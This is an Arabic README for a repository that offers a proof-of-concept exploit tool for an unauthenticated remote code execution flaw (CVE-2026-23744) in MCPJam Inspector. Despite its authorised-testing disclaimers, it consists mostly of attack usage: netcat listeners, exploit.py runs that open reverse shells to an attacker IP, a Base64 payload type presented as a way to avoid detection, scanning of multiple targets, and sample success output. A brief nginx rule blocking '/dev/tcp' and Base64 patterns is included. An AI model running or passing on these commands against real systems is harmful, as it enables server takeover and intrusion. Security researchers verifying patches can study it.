
استغلال لإثبات المفهوم لثغرة CVE-2026-23744 - MCPJam Inspector Remote Code Execution (RCE). توضح هذه الأداة الخلل الأمني في الإصدارات <=1.4.2 وتساعد باحثي الأمن في التحقق من التصحيحات. لأغراض الاختبار المصرح به والتعليم فقط. تتضمن خيارات متعددة للحمولات، تنفيذ الأوامر، وإدارة الجلسات.
هذه الأداة مخصصة لاختبارات الأمان المصرح بها والأغراض التعليمية فقط. الاستخدام غير المصرح به غير قانوني. يتحمل المستخدمون كامل المسؤولية عن أفعالهم.
يحتوي هذا المستودع على إثبات مفهوم لاستغلال الثغرة CVE-2026-23744، وهي ثغرة تنفيذ أوامر عن بعد (RCE) غير مصادق عليها تم اكتشافها في MCPJam Inspector الإصدارات <=1.4.2. الثغرة لها درجة CVSS حرجة تبلغ 9.8، مما يشير إلى خطر شديد مع متجه هجوم شبكي.
| السمة | التفاصيل |
|---|
| معرف CVE | CVE-2026-23744 |
| الثغرة | تنفيذ أوامر عن بعد غير مصادق عليه |
| الإصدارات المتأثرة | <=1.4.2 |
| درجة CVSS | 9.8 (حرجة) |
| متجه الهجوم | شبكة |

تقدم أداة الاستغلال مجموعة شاملة من الميزات المصممة لاختبار الأمان الفعال:
لإعداد أداة الاستغلال، اتبع هذه الخطوات:
استنساخ المستودع:
git clone https://github.com/CerberusMrXi/CVE-2026-23744-MCPJam-RCE-Exploit.git
cd CVE-2026-23744-MCPJam-RCE-Exploit
تثبيت التبعيات:
pip install -r requirements.txt
لبدء استغلال أساسي، قم أولاً بإعداد مستمع، ثم شغّل سكريبت الاستغلال:
# بدء المستمع
nc -lvnp 4444
# تشغيل الاستغلال
python exploit.py -u http://target-ip:8080 -l attacker-ip -p 4444
تنفيذ أوامر فردية أو أوامر من ملف:
# تنفيذ أمر واحد
python exploit.py -u http://target:8080 -l 10.0.0.5 -p 4444 -c "id; whoami"
# تنفيذ أوامر من ملف
python exploit.py -u http://target:8080 -l 10.0.0.5 -p 4444 -C commands.txt
استخدام أنواع حمولات متنوعة لسيناريوهات مختلفة:
# قذيفة عكسية بـ Python
python exploit.py -u http://target:8080 -l 10.0.0.5 -p 4444 -t python
# قذيفة عكسية بـ Netcat
python exploit.py -u http://target:8080 -l 10.0.0.5 -p 4444 -t nc
# حمولة مشفرة بـ Base64
python exploit.py -u http://target:8080 -l 10.0.0.5 -p 4444 -t base64
فحص أهداف متعددة للبحث عن الثغرة:
# إنشاء ملف الأهداف
echo "http://192.168.1.10:8080" > targets.txt
echo "http://192.168.1.11:8080" >> targets.txt
# فحص الأهداف المعرضة للخطر
python exploit.py -f targets.txt -l 10.0.0.5 -p 4444 --scan
استكشاف وظائف متقدمة مثل البصمة، استخدام الوكيل، الوضع المفصل، وإعداد المستمع التلقائي:
# مع البصمة
python exploit.py -u http://target:8080 -l 10.0.0.5 -p 4444 --fingerprint
# مع الوكيل
python exploit.py -u http://target:8080 -l 10.0.0.5 -p 4444 --proxy http://127.0.0.1:8080
# وضع مفصل
python exploit.py -u http://target:8080 -l 10.0.0.5 -p 4444 -v
# مستمع تلقائي
python exploit.py -u http://target:8080 -l 10.0.0.5 -p 4444 --listen
| النوع | الأمر | الأفضل لـ |
|---|---|---|
bash | Bash reverse shell | معظم أنظمة Linux |
python | Python3 reverse shell | الأنظمة المثبت عليها Python |
nc | Netcat reverse shell | الأنظمة المثبت عليها netcat |
perl | Perl reverse shell | الأنظمة المثبت عليها Perl |
php | PHP reverse shell | الأنظمة المثبت عليها PHP |
base64 | Base64 encoded | تجنب الكشف |
[+] Starting enhanced exploit against http://192.168.1.100:8080
[+] Reverse shell to 10.0.0.5:4444
[*] Session ID: AbCdEfGh
[*] Fingerprinting target...
[+] Target OS: Ubuntu
[+] Available capabilities: python3, perl, nc
[*] Executing exploit...
[+] Exploit successful!
[!] Check your netcat listener on 10.0.0.5:4444
للحماية من CVE-2026-23744، من الضروري اتخاذ الإجراءات الفورية التالية:
POST المشبوهة إلى /api/mcp/connect.مثال على قاعدة WAF لـ Nginx لحظر الأنماط الضارة الشائعة:
location /api/mcp/connect {
if ($request_body ~* "bash.*/dev/tcp") { return 403; }
if ($request_body ~* "base64.*-d") { return 403; }
proxy_pass http://backend;
}
س: هل هذا قانوني للاستخدام؟
ج: هذه الأداة قانونية فقط للاستخدام على الأنظمة التي تملكها أو لديك إذن كتابي صريح لاختبارها.
س: ما الأنظمة المعرضة للخطر؟
ج: إصدارات MCPJam Inspector <=1.4.2 هي المعرضة للخطر.
س: كيف يمكنني حماية أنظمتي؟
ج: قم بترقية MCPJam Inspector إلى إصدار >1.4.2 فوراً.
Sudeepa Wanigarathna
الاستخدام غير المصرح به لهذه الأداة غير قانوني ويمكن أن يؤدي إلى عواقب وخيمة، بما في ذلك:
صنع بـ ❤️ بواسطة Sudeepa Wanigarathna